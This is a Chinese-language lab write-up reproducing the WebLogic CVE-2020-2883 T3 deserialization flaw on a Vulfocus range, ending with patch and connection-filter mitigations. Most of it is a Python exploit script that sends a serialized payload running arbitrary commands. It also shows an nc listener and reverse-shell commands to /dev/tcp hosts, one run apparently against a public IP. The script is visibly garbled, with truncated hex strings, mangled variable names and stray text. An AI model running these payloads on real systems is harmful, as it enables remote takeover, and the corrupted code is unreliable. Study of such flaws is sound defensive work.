Vulfocus复现weblogic_CVE-2020-2883漏洞
Vulfocus 复现weblogic_CVE-2020-2883漏洞
漏洞介绍
在Oracle官⽅发布的2020年4⽉关键补丁更新公告CPU(Critical Patch Update)中,两个针对 WebLogic Server ,CVSS 3.0评分为 9.8的严重漏洞(CVE-2020-2883、CVE-
2020-2884),允许未经⾝份验证的攻击者通过T3协议⽹络访问并破坏易受攻击的WebLogic Server,成功的漏洞利⽤可导致WebLogic Server被攻击者接管,从⽽造成远程代码
执⾏。
影响范围
Oracle WebLogic Server 10.3.6.0.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 12.2.1.3.0
Oracle WebLogic Server 12.2.1.4.0
环境搭建
我们使⽤vulfocus靶场⼀键启动搭建本漏洞环境,Vulfocus 是⼀个漏洞集成平台,将漏洞环境 docker 镜像,放⼊即可使⽤,开箱即⽤,可以过。
安装vulfocus之后打开⽹站启动ulfocus docker靶场(图⽚上的显⽰的192.168.109.136 IP地址是系统bug,实际地址是192.168.109.140)
我们可以在服务器192.168.1.111上访问192.168.109.140:50281确认weblogic靶机成功
然后我们通过拓扑图,虚拟机是net⽅式部署,可知攻击机是⽆法访问weblogic服务的,我们可以通过在虚拟⽹卡上添加⼀条端⼝映射
然后我们就可以在攻击机192.168.1.236成功访问weblogic服务了
⾄此,⼀个完整的weblogic靶机环境搭建成功。
漏洞复现
⾸先,漏洞POC如下:
# -*- coding: utf-8 -*-
import socket
import time
import ssl
import binascii
import urlparse
import argparse
import sys
globalProxies = {}
header = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"
}
def parseUrl(url):
parsed = urlparse.urlparse(url)
proto = parsed.scheme
netloc = parsedloc
ip = netloc
if proto == 'http':
port = 80
else:
port = 443
if (':' in netloc):
ip = netloc.split(':')[0]
cve漏洞库port = netloc.split(':')[1]
uri = parsed.path
return (proto, ip, port, uri)
def CVE_2020_2883(cmd):
payload_start = 'aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f757    payload_lenhex = '{:04x}'.format(len(cmd))
payload_cmdhex = binascii.b2a_hex(cmd)
payload_end = '74000465786563770400000003767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707400013178'
payload = payload_start + payload_lenhex + payload_cmdhex + payload_end
return payload
class payloadtest(object):
def __init__(self):
self.vuln = 'cve_2020_2883'
def t3handshake(self,sock,server_addr):
sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
time.sleep(1)
data = v(1024)
#print data
#print 'handshake successful'
def buildT3RequestObject(self,sock,port):
data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a0000000300000000000        data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b427872002477656        data3 = '1a7727000d3234322e323134'
data4 = '2e312e32353461863d1d0000000078'
for d in [data1,data2,data3,data4]:
sock.send(d.decode('hex'))
time.sleep(2)
#print 'send request payload successful,recv length:%d'%(v(2048)))
def sendEvilObjData(self,sock,data):
payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9b        payload+=data
payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e72        payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
sock.send(payload.decode('hex'))
time.sleep(2)
sock.send(payload.decode('hex'))
res = ''
n=1
try:
while True:
n += 1
res += v(4096)
time.sleep(0.1)
if(n>15):
break
except Exception as e:
pass
return res
def check(self, url, cmd,timeout, proxies=globalProxies, **args):
(proto, ip, port, uri) = parseUrl(url)
server_addr = (ip, int(port))
if proto == 'https':
sock = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout)
try:
self.t3handshake(sock,server_addr)
self.buildT3RequestObject(sock,port)
payload = CVE_2020_2883(cmd)
resp = self.sendEvilObjData(sock,payload)
print ('Payload send succeed! Please check.')
return True
except Exception as e:
print ('Failed! Exception:{}'.format(str(e)))
return False
def poc(url,cmd):
x = payloadtest()
return x.check(url, cmd,20)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Weblogic cve-2020-2883 Exp',
usage='use "python %(prog)s --help" for more information',
usage='use "python %(prog)s --help" for more information',
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("-u", "--url",
dest="url",
help="the url to check"
)
parser.add_argument("-c", "--cmd",
dest="cmd",
help="the cmd to run on the target"
)
args = parser.parse_args()
if not args.url or d:
poc(args.url, d)
⾸先开启nc监听nc -lvvp 19999
执⾏攻击脚本,反弹shell
python weblogic-2883.py -u 188.40.189.135:18048/ -c "bash -i >& /dev/tcp/1.1.1.1/19999 0>&1"
返回shell成功执⾏,但是监听⼀直⽆法成功接收到shell,上⽹搜索了⼀下,反弹shell需要编码,通过⽹站
python weblogic-2883.py -u 192.168.1.111:7001/ -c "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMjM2Lz
E5OTk5IDA+JjE=}|{base64,-d}|{bash,-i}"
如上图所⽰,成功反弹shell,访问/tmp/⽬录成功获取flag
修复建议
1、官⽅修复⽅案
Oracle已经发布补丁修复了上述漏洞,请⽤户参考官⽅通告及时下载受影响产品更新补丁,并参照补丁安装包中的readme⽂件进⾏安装更新,以保证长期有效的防护。
2、临时解决⽅案
⽤户可通过控制T3协议的访问来临时阻断针对这些漏洞的攻击。操作⽅法如下:
1. 进⼊WebLogic控制台,在base_domain的配置页⾯中,进⼊“安全”选项卡页⾯,点击“筛选器”,进⼊连接筛选器配置。
2. 在连接筛选器中输⼊:weblogic.security.ConnectionFilterImpl,参考以下写法,在连接筛选器规则中配置符合企业实际情况的规则:
127.0.0.1 * * allow t3 t3s
本机IP * * allow t3 t3s
允许访问的IP  * * allow t3 t3s
* * * deny t3 t3s
3. 保存后若规则未⽣效,建议重新启动WebLogic服务(重启WebLogic服务会导致业务中断,建议相关⼈员评估风险后,再进⾏操作)。

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。